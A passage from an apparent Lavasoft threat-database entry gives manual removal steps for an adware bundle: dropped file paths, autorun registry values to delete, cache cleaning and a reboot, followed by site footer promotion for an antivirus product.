    %Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu26.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\vos_n[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl1E.tmp (56936 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@hejie123[1].txt (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\0Be10MR8[1].exe (11960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj24.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw14.tmp (15 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (88848 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\1znQuZItQ[1] (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (11960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Desktop\AutoTime.lnk (865 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp\nsk1B.tmp (6356 bytes)
    %Program Files%\ttwifi\is-BMP2P.tmp (9036 bytes)
    %Program Files%\ttwifi\unins000.dat (2636 bytes)
    %Documents and Settings%\All Users\Application Data\WindowsMsg\is-JQUO0.tmp (14022 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\ttwifi\is-IJ1PQ.tmp (14022 bytes)
    %Program Files%\ttwifi\is-6H35A.tmp (9098 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ttwifi\ttwifi.lnk (698 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (118 bytes)
    %Documents and Settings%\All Users\Desktop\ttwifi.lnk (686 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\IDH.dll (9098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\hp.exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ttwifi\UnInstall.exe.lnk (678 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_RegDLL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-HRI4J.tmp\nsk1B.tmp (6356 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\IDH.dll (9098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_RegDLL.tmp (4 bytes)
    %WinDir%\WindowsUpdate.log (4453 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\qnsm13.tmp (2660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc12.tmp\WmiInspector.dll (3342 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\icon[1].png (344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\logo[1].png (714 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\zrt_lookup[1].htm (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\jquery-1.8.1[1].js (2983 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[3].txt (12397 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ca-pub-4886776363109745[1].js (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\xu8ohzAYf-_Ky0RDznODng60bK57yvyAAijjGbRhr90[1].js (2737 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\x_button_blue2[1].png (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\CASVWSPU.htm (1685 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[2].txt (6027 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[1].txt (2856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\en[1].png (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\randseek[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\googlelogo_color_112x36dp[1].png (1372 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\CAZMOJ7D (12023 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\zrt_lookup[1].html (3332 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ca-pub-4886776363109745[1].js (1 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (1399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[2].txt (14489 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[2].txt (723 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[2].txt (3394 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[1].txt (9391 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ad_300_250[1].css (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[2].txt (5866 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ad_js[1].js (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[1].txt (13580 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\6903042196597547844[1].png (30037 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[1].txt (8086 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\common[1].js (1833 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\s[1].htm (143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\s[1] (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp.mof (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu28.tmp (7879 bytes)
    %Program Files%\SpaceSoundPro\idscservice.exe (12319 bytes)
    %Program Files%\SpaceSoundPro\uninstaller.exe (17064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HY2F7WRL5V.exe (447582 bytes)
    %Program Files%\SpaceSoundPro\wizzcaster.exe (45820 bytes)
    %Program Files%\SpaceSoundPro\UninstallerCaster.exe (9708 bytes)
    %System%\wbem\Logs\mofcomp.log (1826 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp20.tmp (196 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SpaceSoundPro" = "%Program Files%\SpaceSoundPro\SpaceSoundPro.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Caster" = "%Program Files%\Caster\wizzcaster.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "IDSCPRODUCT" = "%Program Files%\SpaceSoundPro\idscservice.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "osmsg" = "%Documents and Settings%\All Users\Application Data\WindowsMsg\osmsg.exe /AUTORUN"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Caster" = "%Program Files%\SpaceSoundPro\wizzcaster.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now